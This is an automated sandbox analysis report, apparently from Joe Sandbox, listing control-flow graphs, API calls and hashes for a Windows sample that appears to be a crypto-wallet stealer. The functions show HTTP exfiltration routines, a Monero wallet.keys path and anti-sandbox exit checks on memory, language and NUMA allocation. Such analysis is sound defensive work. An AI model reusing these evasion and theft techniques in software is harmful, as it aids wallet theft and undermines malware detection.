                                      • GetProcAddress.KERNEL32(6E9A0000,00E3DD30), ref: 0012AA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: 8a$8c$8d$8e$8g$HttpQueryInfoA$InternetSetOptionA$Xa$Xc$Xd$Xh$xa$xc$xd$xg
                                      • API String ID: 2238633743-3472937861
                                      • Opcode ID: c3afbbe1a9ec9cb92f53cffc612cf8b76d9aff11be5ff2c639654cff37ebcf93
                                      • Instruction ID: 4128a5deee73131d88c079048dc315a4e97d792d72236a03cf303f91fcddbfe2
                                      • Opcode Fuzzy Hash: c3afbbe1a9ec9cb92f53cffc612cf8b76d9aff11be5ff2c639654cff37ebcf93
                                      • Instruction Fuzzy Hash: AF624CB55182809FC366DFA8FDC995677BDE78D341B108B1ABA09CB2F0D734A941CB60

                                      Control-flow Graph

                                      control_flow_graph 801 1148d0-114992 call 12aab0 call 114800 call 12aa50 * 5 InternetOpenA StrCmpCA 816 114994 801->816 817 11499b-11499f 801->817 816->817 818 1149a5-114b1d call 128cf0 call 12ac30 call 12abb0 call 12ab10 * 2 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12ac30 call 12abb0 call 12ab10 * 2 InternetConnectA 817->818 819 114f1b-114f43 InternetCloseHandle call 12ade0 call 11a210 817->819 818->819 905 114b23-114b27 818->905 829 114f82-114ff2 call 128b20 * 2 call 12aab0 call 12ab10 * 8 819->829 830 114f45-114f7d call 12ab30 call 12acc0 call 12abb0 call 12ab10 819->830 830->829 906 114b35 905->906 907 114b29-114b33 905->907 908 114b3f-114b72 HttpOpenRequestA 906->908 907->908 909 114b78-114e78 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12aa50 call 12ac30 * 2 call 12abb0 call 12ab10 * 2 call 12ade0 lstrlen call 12ade0 * 2 lstrlen call 12ade0 HttpSendRequestA 908->909 910 114f0e-114f15 InternetCloseHandle 908->910 1021 114e82-114eac InternetReadFile 909->1021 910->819 1022 114eb7-114f09 InternetCloseHandle call 12ab10 1021->1022 1023 114eae-114eb5 1021->1023 1022->910 1023->1022 1024 114eb9-114ef7 call 12acc0 call 12abb0 call 12ab10 1023->1024 1024->1021
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00114800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                        • Part of subcall function 00114800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00114965
                                      • StrCmpCA.SHLWAPI(?,00E3F970), ref: 0011498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00114B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00130DDE,00000000,?,?,00000000,?,",00000000,?,00E3FA80), ref: 00114E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00114E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00114E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00114E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00114EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00114F15
                                      • HttpOpenRequestA.WININET(00000000,00E3F920,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 00114B65
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00114F1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------$X
                                      • API String ID: 460715078-4062443838
                                      • Opcode ID: df6035774cc05f685d4a0a26228a564ac0a9ad4fdd24f52c5c462419ea384185
                                      • Instruction ID: 8c06e83878eaca095ce37d88c6b1b694cb99ecf35b86fa06198c03be26145108
                                      • Opcode Fuzzy Hash: df6035774cc05f685d4a0a26228a564ac0a9ad4fdd24f52c5c462419ea384185
                                      • Instruction Fuzzy Hash: 1712BB72911128ABCB15EB90EDA2FEEB379BF24300F904599B10676191EF706F58CF61

                                      Control-flow Graph

                                      control_flow_graph 1033 125760-1257c7 call 125d20 call 12ab30 * 3 call 12aa50 * 4 1049 1257cc-1257d3 1033->1049 1050 125827-12589c call 12aa50 * 2 call 111590 call 125510 call 12abb0 call 12ab10 call 12ade0 StrCmpCA 1049->1050 1051 1257d5-125806 call 12ab30 call 12aab0 call 111590 call 125440 1049->1051 1077 1258e3-1258f9 call 12ade0 StrCmpCA 1050->1077 1081 12589e-1258de call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1050->1081 1067 12580b-125822 call 12abb0 call 12ab10 1051->1067 1067->1077 1082 1258ff-125906 1077->1082 1083 125a2c-125a94 call 12abb0 call 12ab30 * 2 call 1116b0 call 12ab10 * 4 call 111670 call 111550 1077->1083 1081->1077 1086 125a2a-125aaf call 12ade0 StrCmpCA 1082->1086 1087 12590c-125913 1082->1087 1213 125d13-125d16 1083->1213 1106 125be1-125c49 call 12abb0 call 12ab30 * 2 call 1116b0 call 12ab10 * 4 call 111670 call 111550 1086->1106 1107 125ab5-125abc 1086->1107 1091 125915-125969 call 12ab30 call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1087->1091 1092 12596e-1259e3 call 12aa50 * 2 call 111590 call 125510 call 12abb0 call 12ab10 call 12ade0 StrCmpCA 1087->1092 1091->1086 1092->1086 1192 1259e5-125a25 call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1092->1192 1106->1213 1113 125ac2-125ac9 1107->1113 1114 125bdf-125c64 call 12ade0 StrCmpCA 1107->1114 1122 125b23-125b98 call 12aa50 * 2 call 111590 call 125510 call 12abb0 call 12ab10 call 12ade0 StrCmpCA 1113->1122 1123 125acb-125b1e call 12ab30 call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1113->1123 1143 125c66-125c71 Sleep 1114->1143 1144 125c78-125ce1 call 12abb0 call 12ab30 * 2 call 1116b0 call 12ab10 * 4 call 111670 call 111550 1114->1144 1122->1114 1218 125b9a-125bda call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1122->1218 1123->1114 1143->1049 1144->1213 1192->1086 1218->1114
                                      APIs
                                        • Part of subcall function 0012AB30: lstrlen.KERNEL32(00114F55,?,?,00114F55,00130DDF), ref: 0012AB3B
                                        • Part of subcall function 0012AB30: lstrcpy.KERNEL32(00130DDF,00000000), ref: 0012AB95
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00125894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001258F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00125AA7
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00125440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00125478
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00125510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00125568
                                        • Part of subcall function 00125510: lstrlen.KERNEL32(00000000), ref: 0012557F
                                        • Part of subcall function 00125510: StrStrA.SHLWAPI(00000000,00000000), ref: 001255B4
                                        • Part of subcall function 00125510: lstrlen.KERNEL32(00000000), ref: 001255D3
                                        • Part of subcall function 00125510: lstrlen.KERNEL32(00000000), ref: 001255FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001259DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00125B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00125C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00125C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: 8h$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-4046243713
                                      • Opcode ID: 50a9947d1d36242798682453ff1b346b95d8f278a7b379529e66956c2e2ffbea
                                      • Instruction ID: 7b0c2876f4c203bae1cb0657a7b1a06efb187d1219933a8377e0b887617fef35
                                      • Opcode Fuzzy Hash: 50a9947d1d36242798682453ff1b346b95d8f278a7b379529e66956c2e2ffbea
                                      • Instruction Fuzzy Hash: 16E114719101189BCB18FBA0FDA7AFD737EAF74340F908568B50667091EF346A68CB52

                                      Control-flow Graph

                                      control_flow_graph 1301 1219f0-121a1d call 12ade0 StrCmpCA 1304 121a27-121a41 call 12ade0 1301->1304 1305 121a1f-121a21 ExitProcess 1301->1305 1309 121a44-121a48 1304->1309 1310 121c12-121c1d call 12ab10 1309->1310 1311 121a4e-121a61 1309->1311 1312 121a67-121a6a 1311->1312 1313 121bee-121c0d 1311->1313 1315 121a71-121a80 call 12ab30 1312->1315 1316 121a99-121aa8 call 12ab30 1312->1316 1317 121b1f-121b30 StrCmpCA 1312->1317 1318 121bdf-121be9 call 12ab30 1312->1318 1319 121afd-121b0e StrCmpCA 1312->1319 1320 121b82-121b93 StrCmpCA 1312->1320 1321 121b63-121b74 StrCmpCA 1312->1321 1322 121bc0-121bd1 StrCmpCA 1312->1322 1323 121b41-121b52 StrCmpCA 1312->1323 1324 121ba1-121bb2 StrCmpCA 1312->1324 1325 121a85-121a94 call 12ab30 1312->1325 1326 121acf-121ae0 StrCmpCA 1312->1326 1327 121aad-121abe StrCmpCA 1312->1327 1313->1309 1315->1313 1316->1313 1344 121b32-121b35 1317->1344 1345 121b3c 1317->1345 1318->1313 1342 121b10-121b13 1319->1342 1343 121b1a 1319->1343 1350 121b95-121b98 1320->1350 1351 121b9f 1320->1351 1348 121b80 1321->1348 1349 121b76-121b79 1321->1349 1332 121bd3-121bd6 1322->1332 1333 121bdd 1322->1333 1346 121b54-121b57 1323->1346 1347 121b5e 1323->1347 1329 121bb4-121bb7 1324->1329 1330 121bbe 1324->1330 1325->1313 1340 121ae2-121aec 1326->1340 1341 121aee-121af1 1326->1341 1338 121ac0-121ac3 1327->1338 1339 121aca 1327->1339 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 121af8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1313 1349->1348 1350->1351 1351->1313 1355->1313
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00121A15
                                      • ExitProcess.KERNEL32 ref: 00121A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: a18e2b159ccf05fa5d15f4f16fe6b6e734c2760890e8d9cee1f577a68cf913e8
                                      • Instruction ID: 07d77126eabaad962b44e312c1112dbaae10a017a27870dd2af018f7cc9542ed
                                      • Opcode Fuzzy Hash: a18e2b159ccf05fa5d15f4f16fe6b6e734c2760890e8d9cee1f577a68cf913e8
                                      • Instruction Fuzzy Hash: CD515F78B04219FFCB14DFE4E994AAE77B9EF54704F604548E902AB280E770E961CB61

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31660), ref: 00129BF1
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31768), ref: 00129C0A
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31588), ref: 00129C22
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31708), ref: 00129C3A
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E315A0), ref: 00129C53
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E39250), ref: 00129C6B
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E266F8), ref: 00129C83
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E26678), ref: 00129C9C
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E316D8), ref: 00129CB4
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31618), ref: 00129CCC
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31648), ref: 00129CE5
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E31678), ref: 00129CFD
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E26818), ref: 00129D15
                                        • Part of subcall function 00129BB0: GetProcAddress.KERNEL32(76210000,00E316F0), ref: 00129D2E
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 001111D0: ExitProcess.KERNEL32 ref: 00111211
                                        • Part of subcall function 00111160: GetSystemInfo.KERNEL32(?), ref: 0011116A
                                        • Part of subcall function 00111160: ExitProcess.KERNEL32 ref: 0011117E
                                        • Part of subcall function 00111110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0011112B
                                        • Part of subcall function 00111110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00111132
                                        • Part of subcall function 00111110: ExitProcess.KERNEL32 ref: 00111143
                                        • Part of subcall function 00111220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0011123E
                                        • Part of subcall function 00111220: __aulldiv.LIBCMT ref: 00111258
                                        • Part of subcall function 00111220: __aulldiv.LIBCMT ref: 00111266
                                        • Part of subcall function 00111220: ExitProcess.KERNEL32 ref: 00111294
                                        • Part of subcall function 00126A10: GetUserDefaultLangID.KERNEL32 ref: 00126A14
                                        • Part of subcall function 00111190: ExitProcess.KERNEL32 ref: 001111C6
                                        • Part of subcall function 001279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001111B7), ref: 00127A10
                                        • Part of subcall function 001279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00127A17
                                        • Part of subcall function 001279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00127A2F
                                        • Part of subcall function 00127A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127AA0
                                        • Part of subcall function 00127A70: RtlAllocateHeap.NTDLL(00000000), ref: 00127AA7
                                        • Part of subcall function 00127A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00127ABF
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E39180,?,001310F4,?,00000000,?,001310F8,?,00000000,00130AF3), ref: 00126D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00126D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00126D99
                                      • Sleep.KERNEL32(00001770), ref: 00126DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,00E39180,?,001310F4,?,00000000,?,001310F8,?,00000000,00130AF3), ref: 00126DBA
                                      • ExitProcess.KERNEL32 ref: 00126DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 262150f45f7f2f81587b6418f684a2e6f37e8c915c1804c6466da2710c6797ab
                                      • Instruction ID: 93135b4146d95093e21db76d2db258b393c9be5984f02a457514639dc8d3dbbd
                                      • Opcode Fuzzy Hash: 262150f45f7f2f81587b6418f684a2e6f37e8c915c1804c6466da2710c6797ab
                                      • Instruction Fuzzy Hash: E3310C31A04228ABCB19F7F0FC57AEEB379AF24340F900928F612661D1DF706965C762

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1436 111220-111247 call 128b40 GlobalMemoryStatusEx 1439 111273-11127a 1436->1439 1440 111249-111271 call 12dd30 * 2 1436->1440 1442 111281-111285 1439->1442 1440->1442 1444 111287 1442->1444 1445 11129a-11129d 1442->1445 1447 111292-111294 ExitProcess 1444->1447 1448 111289-111290 1444->1448 1448->1445 1448->1447
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0011123E
                                      • __aulldiv.LIBCMT ref: 00111258
                                      • __aulldiv.LIBCMT ref: 00111266
                                      • ExitProcess.KERNEL32 ref: 00111294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 67acaf4f15a6d11867f3939d241b968f69fcab1b854e94c73c11360321549c22
                                      • Instruction ID: c11a626d674cb3cb815bd8cdfbc8f37e1eb0857d0336506212b05f11ed27bc5b
                                      • Opcode Fuzzy Hash: 67acaf4f15a6d11867f3939d241b968f69fcab1b854e94c73c11360321549c22
                                      • Instruction Fuzzy Hash: 1E014BB0D44318BAEF14DFE4DC4ABAEBB78AB14705F208458E704BA1C0D77455818B59

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
